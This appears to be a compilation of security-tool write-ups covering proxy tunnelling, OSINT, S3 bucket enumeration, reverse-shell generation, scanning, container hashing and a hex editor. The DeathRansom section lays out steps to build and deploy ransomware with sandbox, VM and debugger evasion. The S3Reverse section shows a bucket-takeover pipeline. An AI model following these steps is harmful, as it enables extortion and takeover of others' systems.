
Wotop - Web On Top Of Any Protocol


WOTOP is a tool meant to tunnel any sort of traffic over a standard HTTP channel.
It is useful for scenarios where a proxy filters all traffic except standard HTTP(S) traffic. Unlike tools which either require you to be behind a proxy that lets you pass arbitrary traffic (possibly after an initial CONNECT request), or tools which work only for SSH, WOTOP imposes no such restrictions.

Working
Assume you want to use SSH to connect to a remote machine where you don't have root privileges.
There will be 7 entities:
  1. Client (Your computer, behind the proxy)
  2. Proxy (Evil)
  3. Target Server (The remote machine you want to SSH to, from Client)
  4. Client WOTOP process
  5. Target WOTOP process
  6. Client SSH process
  7. Target SSH process
If there was no proxy, the communication would be something like:
Client -> Client SSH process -> Target Server -> Target SSH process
In this scenario, here's the proposed method:
Client -> Client SSH process -> Client WOTOP process -> Proxy -> Target WOTOP process -> Target SSH process -> Target Server
WOTOP simply wraps all the data in HTTP packets, and buffers them accordingly.
Another, even more complicated scenario: you have an external utility server and need to access another server's resources from behind a proxy. In this case, wotop still runs on your external server, but instead of using localhost in the second command (Usage section), use the hostname of the target machine.

Usage
On the client machine:
./wotop <client-hop-port> <server-host-name> <server-hop-port>
On the target machine:
./wotop <server-hop-port> localhost <target-port> SERVER
(Note the keyword SERVER at the end)
In the case of SSH, the target-port would be 22. Once these two are running, to SSH you would run the following:
ssh <target-machine-username>@localhost -p <client-hop-port>
Note: The keyword SERVER tells wotop which side of the connection has to be over HTTP.
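A concrete example (hypothetical host name and ports; 8080 is the client hop port, 9999 the server hop port, 22 the SSH target port):
On the client machine:
./wotop 8080 server.example.com 9999
On the target machine:
./wotop 9999 localhost 22 SERVER
Then SSH through the tunnel:
ssh user@localhost -p 8080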

Planned features
  • Better and adaptive buffering
  • Better CLI flags interface
  • Optional encrypting of data
  • Parsing of .ssh/config file for hosts
  • Web interface for remote server admin
  • Web interface for local host
  • Daemon mode for certain configs

Bugs
  • Currently uses a 100ms sleep after every send/receive cycle to bypass a memory error (not yet eliminated).
  • HTTP responses may come before HTTP requests. Let me know if you know of a proxy which blocks such responses.
  • The logger seems to be non-thread-safe despite locking; this leads to memory errors, so it is disabled for now.



Should-I-Trust - OSINT Tool To Evaluate The Trustworthiness Of A Company


should-i-trust is a tool to evaluate OSINT signals for a domain.

Requirements

should-i-trust requires API keys from the following sources:
Censys.io - Free for the first 250 queries/month
VirusTotal - Free
GrayHatWarfare - Free with limited results

Use Case
You're part of a review board that's responsible for evaluating new vendors. You're specifically responsible for ensuring new vendors meet compliance and security requirements.
Standard operating procedure is to ask for one or all of the following: SOC report, VSAQ, CAIQ, SIG/SIG-Lite. Not all vendors will have these reports and/or questionnaire answers. Maybe it's org process to deny vendor intake without this information, or maybe this is a "special" engagement and you need to ascertain trustworthiness without the docs. Maybe you don't trust the responses in the docs.
should-i-trust is a tool to go beyond standard responses and look for signals that the organization should not be trusted. Maybe they're exposing their CI/CD to the internet with no auth. Maybe they have an EC2 instance with prod code running and no directory restrictions.
should-i-trust doesn't provide all the information you will need to make a go/no-go decision but it will allow you to quickly gather OSINT data for further evaluation.
should-i-trust is also useful for red team or similar engagements. It can quickly identify targets to probe.

Setup

Either install the Chrome extension through the Chrome Web Store, or download it and manually install it in Chrome using developer mode.

Running
Open the extension
Enter your API keys (required once)
Enter a domain to query

Output
  • If there's an indicator the domain participates in a bug bounty program
  • Domains found through VirusTotal, Censys.io, and the Google Cert Transparency Report
  • IPs and open ports found through Censys.io
  • Repositories found on GitHub, GitLab, and Bitbucket
  • Misc data found on virustotal.com
  • AWS bucket files found exposed through GrayHatWarfare

Road Map
TBD


Project iKy v2.5.0 - Tool That Collects Information From An Email And Shows Results In A Nice Visual Interface


Project iKy is a tool that collects information from an email and shows results in a nice visual interface.

Visit the Gitlab Page of the Project

Installation

Clone repository

git clone https://gitlab.com/kennbroorg/iKy.git

Install Backend

Redis

You must install Redis
wget http://download.redis.io/redis-stable.tar.gz
tar xvzf redis-stable.tar.gz
cd redis-stable
make
sudo make install

Python stuff and Celery

You must install the libraries inside requirements.txt
python3 -m pip install -r requirements.txt

Install Frontend

Node

First of all, install nodejs.

Dependencies

Inside the frontend directory, install the dependencies
cd frontend
npm install

Wake up iKy Tool

Turn on Backend

Redis

Turn on the server in a terminal
redis-server

Python stuff and Celery

Turn on Celery in another terminal, from the backend directory
./celery.sh
Again, in another terminal, turn on the backend app from the backend directory
python3 app.py

Turn on Frontend

Finally, to run the frontend server, execute the following command from the frontend directory
npm start

Screen after turning on iKy


Browser

Open this URL in the browser

Config API Keys

Once the application is loaded in the browser, you should go to the Api Keys option and load the values of the APIs that are needed.
  • Fullcontact: Generate the APIs from here
  • Twitter: Generate the APIs from here
  • Linkedin: Only the user and password of your account must be loaded
  • HaveIBeenPwned : Generate the APIs from here (Paid)
  • Emailrep.io : Generate the APIs from here

Wiki



Demo Videos


iKy eko15


iKy Version 2


Testing iKy with Emiliano


Testing iKy with Giba


iKy version 1

iKy version 0

Disclaimer

Anyone who contributes or contributed to the project, including me, is not responsible for the use of the tool (Neither the legal use nor the illegal use, nor the "other" use).
Keep in mind that this software was initially written as a joke, then for educational purposes (to educate ourselves), and now the goal is to collaborate with the community making quality free software, and while the quality is not excellent (sometimes not even good) we strive to pursue excellence.
Consider that all the information collected is free and available online; the tool only tries to discover, collect and display it. Many times the tool cannot even achieve its goal of discovery and collection. Please load the necessary APIs before remembering my mother. If even with the APIs it doesn't show the "nice" things you expect to see, try other e-mails before you remember my mother. If you still do not see the "nice" things you expect to see, you can create an issue or contact us by e-mail or on any of the social networks, but keep in mind that my mother is neither the creator of nor a contributor to the project.
We do not refund your money if you are not satisfied. I hope you enjoy using the tool as much as we enjoyed making it. The effort was and is enormous (time, knowledge, coding, tests, reviews, etc.) but we would do it again. Do not use the tool if you cannot read the instructions and/or this disclaimer clearly.
By the way, for those who insist on remembering my mother, she died many years ago but I love her as if she were right here.


Pwned - Simple CLI Script To Check If You Have A Password That Has Been Compromised In A Data Breach


Pwned is a simple command-line Python script to check if you have a password that has been compromised in a data breach. The script uses the haveibeenpwned API to check whether your passwords were leaked during one of the many breaches of online services.
The API uses a k-Anonymity model that allows a password to be searched for by partial hash, anonymously verifying whether a password was leaked without disclosing the full searched password.
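To illustrate the k-Anonymity model, here is a minimal sketch of the range query against the public Pwned Passwords API (not the script's exact code; the function name is ours). Only the first five hex characters of the password's SHA-1 hash ever leave your machine.

import hashlib
import urllib.request

def pwned_count(password):
    # Hash locally; only the first 5 hex chars of the SHA-1 are sent (k-Anonymity)
    sha1 = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    prefix, suffix = sha1[:5], sha1[5:]
    with urllib.request.urlopen("https://api.pwnedpasswords.com/range/" + prefix) as resp:
        body = resp.read().decode("utf-8")
    # The API answers with "SUFFIX:COUNT" lines for every breached hash sharing the prefix
    for line in body.splitlines():
        candidate, _, count = line.partition(":")
        if candidate.strip() == suffix:
            return int(count)
    return 0

print(pwned_count("password123"))

A non-zero return value means the password appeared in that many breach records.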

How pwned script works

Git Installation
# clone the repo
$ git clone https://github.com/sameera-madushan/Pwned.git

# change the working directory to Pwned
$ cd Pwned

# install the requirements
$ pip3 install -r requirements.txt

Usage
python pwned.py -p <your password here>

Support & Contributions
  • Please ⭐️ this repository if this project helped you!
  • Contributions of any kind welcome!

License
MIT ©sameera-madushan


S3Reverse - Convert The Format Of Various S3 Buckets Into One Format


Converts the format of various S3 buckets into one format, for bug bounty and security testing.

Install
$ go get -u github.com/hahwul/s3reverse  

Usage

Input options
Basic Usage

8""""8 eeee 8"""8 8"""" 88 8 8"""" 8"""8 8""""8 8""""
8 8 8 8 8 88 8 8 8 8 8 8
8eeeee 8 8eee8e 8eeee 88 e8 8eeee 8eee8e 8eeeee 8eeee
88 eee8 eeee 88 8 88 "8 8 88 88 8 88 88
e 88 88 88 8 88 8 8 88 88 8 e 88 88
8eee88 eee88 88 8 88eee 8ee8 88eee 88 8 8eee88 88eee

by @hahwul

Usage of ./s3reverse:
  -iL string
        input List
  -oA string
        Write output in Array format (optional)
  -oN string
        Write output in Normal format (optional)
  -tN
        to name
  -tP
        to path-style
  -tS
        to s3 url
  -tV
        to virtual-hosted-style
  -verify
        testing bucket (acl, takeover)

Using from file
$ s3reverse -iL sample -tN
udemy-web-upload-transitional
github-cloud
github-production-repository-file-5c1aeb
github-production-upload-manifest-file-7fdce7
github-production-user-asset-6210df
github-education-web
github-jobs
s3-us-west-2.amazonaws.com
optimizely
app-usa-modeast-prod-a01239f
doc
swipely-merchant-assets
adslfjasldfkjasldkfjalsdfkajsljasldf
cbphotovideo
cbphotovideo-eu
public.chaturbate.com
wowdvr
cbvideoupload
testbuckettesttest

Using from pipeline
$ cat sample | s3reverse -tN
udemy-web-upload-transitional
github-cloud
github-production-repository-file-5c1aeb
github-production-upload-manifest-file-7fdce7
github-production-user-asset-6210df
github-education-web
github-jobs
s3-us-west-2.amazonaws.com
optimizely
app-usa-modeast-prod-a01239f
doc
swipely-merchant-assets
adslfjasldfkjasldkfjalsdfkajsljasldf
cbphotovideo
cbphotovideo-eu
public.chaturbate.com
wowdvr
cbvideoupload
testbuckettesttest

Output options
to Name
$ s3reverse -iL sample -tN
udemy-web-upload-transitional
github-cloud
github-production-repository-file-5c1aeb
github-production-upload-manifest-file-7fdce7
... snip ...

to Path Style
$ s3reverse -iL sample -tP
https://s3.amazonaws.com/udemy-web-upload-transitional
https://s3.amazonaws.com/github-cloud
https://s3.amazonaws.com/github-production-repository-file-5c1aeb
... snip ...

to Virtual Hosted Style
$ s3reverse -iL sample -tV
udemy-web-upload-transitional.s3.amazonaws.com
github-cloud.s3.amazonaws.com
github-production-repository-file-5c1aeb.s3.amazonaws.com
github-production-upload-manifest-file-7fdce7.s3.amazonaws.com
github-production-user-asset-6210df.s3.amazonaws.com
... snip ...

Verify mode
$ s3reverse -iL sample -verify
[NoSuchBucket] adslfjasldfkjasldkfjalsdfkajsljasldf
[PublicAccessDenied] github-production-user-asset-6210df
[PublicAccessDenied] github-jobs
[PublicAccessDenied] public.chaturbate.com
[PublicAccessDenied] github-education-web
[PublicAccessDenied] github-production-repository-file-5c1aeb
[PublicAccessDenied] testbuckettesttest
[PublicAccessDenied] app-usa-modeast-prod-a01239f
[PublicAccessGranted] cbphotovideo-eu
[PublicAccessDenied] swipely-merchant-assets
[PublicAccessDenied] optimizely
[PublicAccessDenied] wowdvr
[PublicAccessGranted] s3-us-west-2.amazonaws.com
[PublicAccessDenied] cbphotovideo
[PublicAccessDenied] cbvideoupload
[PublicAccessDenied] github-production-upload-manifest-file-7fdce7
[PublicAccessDenied] doc
[PublicAccessDenied] udemy-web-upload-transitional
[PublicAccessDenied] github-cloud

Case study
Pipelining meg, s3reverse, gf and s3scanner to find S3 misconfigurations.
$ meg -d 1000 -v / ; cd out ; gf s3-buckets | s3reverse -tN > buckets ; s3scanner buckets  
Find S3 bucket takeovers
$ meg -d 1000 -v / ; cd out ; gf s3-buckets | s3reverse -verify | grep NoSuchBucket > takeovers  


Print-My-Shell - Tool To Automate The Process Of Generating Various Reverse Shells


"Print My Shell" is a python script, wrote to automate the process of generating various reverse shells based on PayloadsAllTheThings and Pentestmonkey reverse shell cheat sheets.
Using this script you can easily generate various types of reverse shells without leaving your command line. This script will come in handy when you are playing CTF like challenges.

Available Shell Types
  • Bash
  • Perl
  • Ruby
  • Golang
  • Netcat
  • Ncat
  • Powershell
  • Awk
  • Lua
  • Java
  • Socat
  • Nodejs
  • Telnet
  • Python

Git Installation
# clone the repo
$ git clone https://github.com/sameera-madushan/Print-My-Shell.git

# change the working directory to Print-My-Shell
$ cd Print-My-Shell

Usage
usage: shell.py [-h] [-i IPADDR] [-p PORTNUM] [-t TYPE] [-l] [-a]

optional arguments:
  -h, --help            show this help message and exit
  -i IPADDR, --ip IPADDR
                        IP address
  -p PORTNUM, --port PORTNUM
                        Port number
  -t TYPE, --type TYPE  Type of the reverse shell to generate
  -l, --list            List all available shell types
  -a, --all             Generate all the shells
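For example, to generate a Bash reverse shell pointing back at a listener (the IP, port and type token below are placeholders; run -l to see the exact type names):
python shell.py -i 10.0.0.5 -p 4444 -t bash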

Support & Contributions
  • Please ⭐️ this repository if this project helped you!
  • Contributions of any kind welcome!

License
MIT ©sameera-madushan

References
Payloads All The Things Reverse Shell Cheat Sheet
Pentestmonkey Reverse Shell Cheat Sheet


Nuclei - Nuclei Is A Fast Tool For Configurable Targeted Scanning Based On Templates Offering Massive Extensibility And Ease Of Use


Nuclei is a fast tool for configurable targeted scanning based on templates, offering massive extensibility and ease of use.
Nuclei is used to send requests across targets based on a template, leading to zero false positives and providing effective scanning for known paths. The main use cases for nuclei are during the initial reconnaissance phase, to quickly check for low-hanging fruit or CVEs across targets that are known and easily detectable. It uses the retryablehttp-go library, designed to handle various errors and retries in case of blocking by WAFs, which is also one of our core modules from custom-queries.
We have also open-sourced a dedicated repository to maintain various types of templates; we hope that you will contribute there too. Templates are provided in the hope that they will be useful and will allow everyone to build their own templates for the scanner. Check out the guide at GUIDE.md for a primer on nuclei templates.

Features
  • Simple and modular code base, making it easy to contribute.
  • Fast and fully configurable using a template-based engine.
  • Handles edge cases with retries, backoffs etc. to deal with WAFs.
  • Smart matching functionality for zero-false-positive scanning.

Usage
nuclei -h
This will display help for the tool. Here are all the switches it supports.
Flag       Description                                              Example
-c         Number of concurrent requests (default 10)               nuclei -c 100
-l         List of urls to run templates                            nuclei -l urls.txt
-t         Templates input file/files to check across hosts         nuclei -t git-core.yaml
-t         Templates input file/files to check across hosts         nuclei -t "path/*.yaml"
-nC        Don't use colors in output                               nuclei -nC
-o         File to save output result (optional)                    nuclei -o output.txt
-silent    Show only found results in output                        nuclei -silent
-retries   Number of times to retry a failed request (default 1)    nuclei -retries 1
-timeout   Seconds to wait before timeout (default 5)               nuclei -timeout 5
-v         Show verbose output                                      nuclei -v
-version   Show version of nuclei                                   nuclei -version

Installation Instructions

From Binary
The installation is easy. You can download the pre-built binaries for your platform from the Releases page. Extract them using tar, move the binary to your $PATH and you're ready to go.
> tar -xzvf nuclei-linux-amd64.tar
> mv nuclei-linux-amd64 /usr/bin/nuclei
> nuclei -h

From Source
nuclei requires go1.13+ to install successfully. Run the following command to get the repo -
> GO111MODULE=on go get -u -v github.com/projectdiscovery/nuclei/cmd/nuclei
In order to update the tool, use the -u flag with the go get command.

Running nuclei

1. Running nuclei with a single template.
This will run the tool against all the hosts in urls.txt and return the matched results.
> nuclei -l urls.txt -t git-core.yaml -o results.txt
You can also pass the list of hosts on standard input (STDIN). This allows for easy integration in automation pipelines.
> cat urls.txt | nuclei -t git-core.yaml -o results.txt

2. Running nuclei with multiple templates.
This will run the tool against all the hosts in urls.txt with all the templates in the path-to-templates directory and return the matched results.
> nuclei -l urls.txt -t "path-to-templates/*.yaml" -o results.txt 

3. Automating nuclei with subfinder and any other similar tool.
> subfinder -d hackerone.com | httprobe | nuclei -t "path-to-templates/*.yaml" -o results.txt
Nuclei supports glob expressions ending in .yaml, meaning multiple templates can easily be passed to be executed one after the other. Please refer to this guide to build your own custom templates.
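For orientation, a minimal template might look roughly like the sketch below (based on the early template format; field names and matcher syntax can differ between nuclei versions, so treat the linked guide as authoritative):

id: git-config
info:
  name: Git Config File Disclosure
  severity: medium
requests:
  - method: GET
    path:
      - "{{BaseURL}}/.git/config"
    matchers:
      - type: word
        words:
          - "[core]"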

Thanks
nuclei is made with love by the projectdiscovery team. Community contributions have made the project what it is. See the Thanks.md file for more details. Also check out these similar awesome open-source projects that may fit in your workflow:
https://github.com/jaeles-project/jaeles
https://github.com/ameenmaali/qsfuzz
https://github.com/proabiral/inception
https://github.com/hannob/snallygaster


DeathRansom - A Ransomware Developed In Python, With Bypass Techniques, For Educational Purposes


What is ransomware?
Ransomware is malware that encrypts all your files and shows a ransom request, which tells you to pay a set amount, usually in bitcoins (BTC), within a set time to decrypt your files, or they will be deleted.

How does it work?
First, the script checks whether it's in a sandbox, debugger, VM, etc., and tries to bypass them.
It then encrypts all files, starting with the directory defined on line 60 of deathransom.py.
Then it downloads the ransom request script; disables cmd, Task Manager and the registry tools; and starts the counter to delete the files.

How to use it?
Install the requirements by typing pip install -r requirements.txt and python3 -m pip install PyQt5
Generate the keys with python generate_key.py, upload the public key to pastebin, copy the raw link, and change the site on line 7 of deathransom.py
Turn time_script.py and main.py (located at Ransom Request) into exes.
Turn time_script.py into an exe using pyinstaller under Python 2 by typing pyinstaller --onefile --windowed <FILE>
To turn the ransom request's main.py into an exe, use pyinstaller under Python 3: pyinstaller --onefile --windowed main.py
Then upload the scripts to any file hosting service and change the links on lines 28 and 31 of deathransom.py
Finally, turn deathransom.py into an exe using pyinstaller under Python 2 and be happy :D

Bypass Techniques

  • Anti-Disassembly
Creates several variables to try to make disassembly difficult.

  • Anti-Debugger
Checks if a debugger is active using the ctypes function windll.kernel32.IsDebuggerPresent() (see the sketch after this list).

  • Anti-VM
Checks whether the machine's MAC address matches the default MAC addresses of common VMs.

  • Anti-Sandbox
  • Sleep-Acceleration
Some sandboxes speed up sleep; this function checks that nothing out of the ordinary has occurred.
  • Sandbox in Process
Checks whether any known sandbox appears in the running processes.
  • Display-Prompt
Shows a message; the malware is executed only if the user interacts with the pop-up.
  • Idle-Time
Sleeps for a while and proceeds. Some sandboxes wait for a while and then stop running; this tries to bypass that.
  • Check-Click
If the user does not click the required number of times, the malware will not be executed.
  • Check-Cursor-Pos
If the user does not move the mouse within a set time, the malware will not be executed.
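A minimal sketch of the debugger check described above (the IsDebuggerPresent call is a standard Windows API; the bail-out reaction is a hypothetical illustration, not DeathRansom's exact code):

import ctypes

def debugger_present():
    # Windows-only: returns nonzero when a user-mode debugger is attached
    return bool(ctypes.windll.kernel32.IsDebuggerPresent())

if debugger_present():
    raise SystemExit  # abort before doing anything observable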

How to edit the Ransom Request
To edit it, you need to install PySide2. Open the main.ui file and edit what you want.

Demonstration Video


Demonstration video (PT-BR)




wxHexEditor - Hex Editor / Disk Editor for Huge Files or Devices on Linux, Windows and MacOSX


wxHexEditor is another free hex editor, built because there was no good hex editor for Linux systems, especially for big files.

Low Level Data Recovery with wxHexEditor

    wxHexEditor is not an ordinary hex editor; it can work as a low-level disk editor too.
If you have problems with your HDD or partition, you can recover your data from the HDD or from the partition by editing sectors in raw hex.
You can edit your partition tables, or you can recover files from the file system by hand with the help of wxHexEditor.
Or you might want to analyze your big binary files, partitions, devices... If you need a good reverse engineering tool like a good hex editor, you are welcome.
wxHexEditor can edit HDD/SSD disk devices or partitions in raw form, up to exabyte sizes.

Features
  • It uses 64-bit file descriptors (supports files or devices up to 2^64 bytes, i.e. some exabytes, but tested only up to a 1 PetaByte file so far).
  • It does NOT copy the whole file to your RAM. That makes it FAST, and it can open huge files (multiple giga- < tera- < peta- < exabytes).
  • You can delete/insert bytes in a file, more than once, without creating a temp file!
  • Can open your devices on Linux, Windows or MacOSX.
  • Memory usage: currently ~25 MegaBytes with multiple >~8GB files opened.
  • Can operate on a file through XOR encryption.
  • Has multiple views to show multiple files at the same time.
  • Has x86 disassembly support (via the integrated udis86 library) to hack things a little faster.
  • Has colourful tags to make reverse engineering easier and more fun.
  • You can copy/edit your disks and HDD sectors with it. (Useful for rescuing files/partitions by hand.)
  • Sector indication on disk devices, plus a Go to Sector dialog...
  • Formatted CopyAs! It's easy to copy part of a file in HEX format for C/C++ source or ASM source; also supports HTML, phpBB and Wiki page formats with TAGs!
  • Supports hex- or text-editor-alone operation. Can also disable the Offset region.
  • Supports customizable hex panel formatting and colors.
  • Allows Linux process memory editing operations.
  • Comparison of binary files, allows merging of near results.
  • Supports ***many*** encodings, including almost all DOS/Windows/MacOS code pages and multi-byte character sets like UTF-8/16/32, Shift JIS, GBK, EUC_KR...
  • Decimal, hexadecimal, octal and LBA ("Sector+Offset") addressing modes (switchable from one to another by right-clicking on the Offset panel).
  • Save selection as a dump file, to make life easier.
  • "Find Some Bytes" feature to quickly find the next meaningful bytes in a file/disk.
  • MD/RIPEMD/SHA/TIGER/HAVAL/CRC/ADLER/GOST/WHIRLPOOL/SNEFRU checksum functions (via the integrated mhash library).
  • Import & export of TAGs from file.
  • Written with C++/wxWidgets GUI libs and can be used on other OSes such as Mac OS and Windows as a native application.

Compilation instructions
Just launch make!

Compilation dependencies on Linux
  • wxgtk;

wxHexEditor Wiki!

Where is the documentation of wxHexEditor? Nowhere, until now.
You can find shortcuts of wxHexEditor at this wiki page


Terrier - A Image And Container Analysis Tool To Identify And Verify The Presence Of Specific Files According To Their Hashes


Terrier is an image and container analysis tool that can be used to scan OCI images and containers to identify and verify the presence of specific files according to their hashes. A detailed write-up of Terrier can be found on the Heroku blog: https://blog.heroku.com/terrier-open-source-identifying-analyzing-containers.

Installation

Binaries
For installation instructions from binaries please visit the Releases Page.

Via Go
$ go get github.com/heroku/terrier

Building from source
Via go
$ go build
or
$ make all

Usage
$ ./terrier -h
Usage of ./terrier:
-cfg string
Load config from provided yaml file (default "cfg.yml")
An OCI TAR of the image to be scanned is required; this is provided to Terrier via the "Image" value in cfg.yml.
The following Docker command can be used to convert a Docker image to a TAR that can be scanned by Terrier.
# docker save imageid -o image.tar
$ ./terrier 
[+] Loading config: cfg.yml
[+] Analysing Image
[+] Docker Image Source: image.tar
[*] Inspecting Layer: 05c3c2c60920f68b506d3c66e0f6148b81a8b0831388c2d61be5ef02190bcd1f
[!] All components were identified and verified: (493/493)

Example YML config
Terrier parses YAML; below is an example config.
#THIS IS AN EXAMPLE CONFIG, MODIFY TO YOUR NEEDS

mode: image
image: image.tar
# mode: container
# path: merged
# verbose: true
# veryverbose: true

files:
  - name: '/usr/bin/curl'
    hashes:
      - hash: '2353cbb7b47d0782ba8cdd9c7438b053c982eaaea6fbef8620c31a58d1e276e8'
      - hash: '22e88c7d6da9b73fbb515ed6a8f6d133c680527a799e3069ca7ce346d90649b2aaa'
      - hash: '9a43cb726fef31f272333b236ff1fde4beab363af54d0bc99c304450065d9c96'
      - hash: '8b7c559b8cccca0d30d01bc4b5dc944766208a53d18a03aa8afe97252207521faa'
  - name: '/usr/bin/go'
    hashes:
      - hash: '2353cbb7b47d0782ba8cdd9c7438b053c982eaaea6fbef8620c31a58d1e276e8'

#UNCOMMENT TO ANALYZE HASHES
# hashes:
#   - hash: '8b7c559b8cccca0d30d01bc4b5dc944766208a53d18a03aa8afe97252207521faa'
#   - hash: '22e88c7d6da9b73fbb515ed6a8f6d133c680527a799e3069ca7ce346d90649b2aa'
#   - hash: '60a2c86db4523e5d3eb41a247b4e7042a21d5c9d483d59053159d9ed50c8aa41aa'

What does Terrier do?
Terrier is a CLI tool that allows you to:
  • Scan an OCI image for the presence of one or more files that match one or more provided SHA256 hashes
  • Scan a running Container for the presence of one or more files that match one or more provided SHA256 hashes

What is Terrier useful for?

Scenario 1
Terrier can be used to verify whether a specific OCI image makes use of a specific binary, which is useful in a supply chain verification scenario. For example, we may want to check that a specific Docker image is making use of a specific version or versions of cURL. In this case, Terrier is supplied with the SHA256 hashes of the binaries that are trusted.
An example YAML file for this scenario might look like this:
mode: image
# verbose: true
# veryverbose: true
image: golang1131.tar

files:
  - name: '/usr/local/bin/analysis.sh'
    hashes:
      - hash: '9adc0bf7362bb66b98005aebec36691a62c80d54755e361788c776367d11b105'
  - name: '/usr/bin/curl'
    hashes:
      - hash: '23afbfab4f35ac90d9841a6e05f0d1487b6e0c3a914ea8dab3676c6dde612495'
  - name: '/usr/local/bin/staticcheck'
    hashes:
      - hash: '73f89162bacda8dd2354021dc56dc2f3dba136e873e372312843cd895dde24a2'

Scenario 2
Terrier can be used to verify the presence of a particular file or files in an OCI image according to a set of provided hashes. This can be useful to check whether an OCI image contains a malicious file, or a file that needs to be identified.
An example YAML file for this scenario might look like this:
mode: image
# verbose: true
# veryverbose: true
image: alpinetest.tar
hashes:
  - hash: '8b7c559b8cccca0d30d01bc4b5dc944766208a53d18a03aa8afe97252207521f'
  - hash: '22e88c7d6da9b73fbb515ed6a8f6d133c680527a799e3069ca7ce346d90649b2'
  - hash: '60a2c86db4523e5d3eb41a247b4e7042a21d5c9d483d59053159d9ed50c8aa41'
  - hash: '9a43cb726fef31f272333b236ff1fde4beab363af54d0bc99c304450065d9c96'

Scenario 3
Terrier can be used to verify the components of containers at runtime by analysing the contents of /var/lib/docker/overlay2/.../merged. An example YAML file for this scenario might look like this:
mode: container
verbose: true
# veryverbose: true
# image: latestgo13.tar
path: merged

files:
  - name: '/usr/local/bin/analysis.sh'
    hashes:
      - hash: '9adc0bf7362bb66b98005aebec36691a62c80d54755e361788c776367d11b105'
  - name: '/usr/local/go/bin/go'
    hashes:
      - hash: '23afbfab4f35ac90d9841a6e05f0d1487b6e0c3a914ea8dab3676c6dde612495'
  - name: '/usr/local/bin/staticcheck'
    hashes:
      - hash: '73f89162bacda8dd2354021dc56dc2f3dba136e873e372312843cd895dde24a2'
  - name: '/usr/local/bin/gosec'
    hashes:
      - hash: 'e7cb8304e032ccde8e342a7f85ba0ba5cb0b8383a09a77ca282793ad7e9f8c1f'
  - name: '/usr/local/bin/errcheck'
    hashes:
      - hash: '41f725d7a872cad4ce1f403938937822572e0a38a51e8a1b29707f5884a2f0d7'
  - name: '/var/lib/dpkg/info/apt.postrm'
    hashes:
      - hash: '6a8f9af3abcfb8c6e35887d11d41a83782b50f5766d42bd1e32a38781cba0b1c'

Usage

Example 1
Terrier is a CLI and makes use of YAML. An example YAML config:
mode: image
# verbose: true
# veryverbose: true
image: alpinetest.tar
files:
  - name: '/usr/local/go/bin/go'
    hashes:
      - hash: '8b7c559b8cccca0d30d01bc4b5dc944766208a53d18a03aa8afe97252207521f'
      - hash: '22e88c7d6da9b73fbb515ed6a8f6d133c680527a799e3069ca7ce346d90649b2aaa'
      - hash: '60a2c86db4523e5d3eb41a247b4e7042a21d5c9d483d59053159d9ed50c8aa41aaa'
      - hash: '8b7c559b8cccca0d30d01bc4b5dc944766208a53d18a03aa8afe97252207521faa'
  - name: '/usr/bin/delpart'
    hashes:
      - hash: '9a43cb726fef31f272333b236ff1fde4beab363af54d0bc99c304450065d9c96aaa'
  - name: '/usr/bin/stdbuf'
    hashes:
      - hash: '8b7c559b8cccca0d30d01bc4b5dc944766208a53d18a03aa8afe97252207521faa'
      - hash: '22e88c7d6da9b73fbb515ed6a8f6d133c680527a799e3069ca7ce346d90649b2aa'
      - hash: '60a2c86db4523e5d3eb41a247b4e7042a21d5c9d483d59053159d9ed50c8aa41aa'
In the example below, Terrier has been instructed via the YAML above to verify multiple files.
$./terrier 
[+] Loading config: cfg.yml
[+] Analysing Image
[+] Docker Image Source: alpinetest.tar
[*] Inspecting Layer: 05c3c2c60920f68b506d3c66e0f6148b81a8b0831388c2d61be5ef02190bcd1f
[*] Inspecting Layer: 09c25a178d8a6f8b984f3e72ca5ec966215b24a700ed135dc062ad925aa5eb23
[*] Inspecting Layer: 36351e8e1da92268d40245cfbcd499a1173eeacc23be428386c8fc0a16f0b10a
[*] Inspecting Layer: 7224ca1e886eeb7e63a9e978b1a811ed52f4a53ccb65f7c510fa04a0d1103fdf
[*] Inspecting Layer: 7a2e464d80c7a1d89dab4321145491fb94865099c59975cfc840c2b8e7065014
[*] Inspecting Layer: 88a583fe02f250344f89242f88309c666671042b032411630de870a111bea971
[*] Inspecting Layer: 8db14b6fdd2cf8b4c122824531a4d85e07f1fecd6f7f43eab7f2d0a90d8c4bf2
[*] Inspecting Layer: 9196e3376d1ed69a647e728a444662c10ed21feed4ef7aaca0d10f452240a09a
[*] Inspecting Layer: 92db9b9e59a64cdf486203189d02acff79c3360788b62214a49d2263874ee811
[*] Inspecting Layer: bc4bb4a45da628724c9f93400a9149b2dd8a5d437272cb4e572cfaec64512d98
[*] Inspecting Layer: be7d600e4e8ed3000e342ef6482211350069d935a14aeff4d9fc3289e1426ed3
[*] Inspecting Layer: c4cec85dfa44f0a8856064922cff1c39b872b506dd002e33664d11a80f75a149
[*] Inspecting Layer: c998d6f023b7b9e3c186af19bcd1c2574f0d01b943077281ac5bd32e02dc57a5
[!] All components were identified and verified: (493/493)
Terrier sets its return code depending on the result of the tests. In the case of the test above, the return code will be "0", which indicates a successful test, as one instance of each provided component was identified and verified.

Example 2
Terrier is instructed to identify any files in the provided image that match the provided SHA256 hashes. YAML file cfg.yml
mode: image
# verbose: true
# veryverbose: true
image: 1070caa1a8d89440829fd35d9356143a9d6185fe7f7a015b992ec1d8aa81c78a.tar
hashes:
  - hash: '8b7c559b8cccca0d30d01bc4b5dc944766208a53d18a03aa8afe97252207521f'
  - hash: '22e88c7d6da9b73fbb515ed6a8f6d133c680527a799e3069ca7ce346d90649b2'
  - hash: '60a2c86db4523e5d3eb41a247b4e7042a21d5c9d483d59053159d9ed50c8aa41'
  - hash: '9a43cb726fef31f272333b236ff1fde4beab363af54d0bc99c304450065d9c96'
Running Terrier.
./terrier 
[+] Loading config: cfg.yml
[+] Docker Image Source: golang.tar
[*] Inspecting Layer: 1070caa1a8d89440829fd35d9356143a9d6185fe7f7a015b992ec1d8aa81c78a
[*] Inspecting Layer: 414833cdb33683ab8607565da5f40d3dc3f721e9a59e14e373fce206580ed40d
[*] Inspecting Layer: 6bd93c6873c822f793f770fdf3973d8a02254a5a0d60d67827480797f76858aa
[*] Inspecting Layer: c40c240ae37a2d2982ebcc3a58e67bf07aeaebe0796b5c5687045083ac6295ed
[*] Inspecting Layer: d2850df0b6795c00bdce32eb9c1ad9afc0640c2b9a3e53ec5437fc5539b1d71a
[*] Inspecting Layer: f0c2fe7dbe3336c8ba06258935c8dae37dbecd404d2d9cd74c3587391a11b1af
[!] Found file 'f0c2fe7dbe3336c8ba06258935c8dae37dbecd404d2d9cd74c3587391a11b1af/usr/bin/curl' with hash: 9a43cb726fef31f272333b236ff1fde4beab363af54d0bc99c304450065d9c96
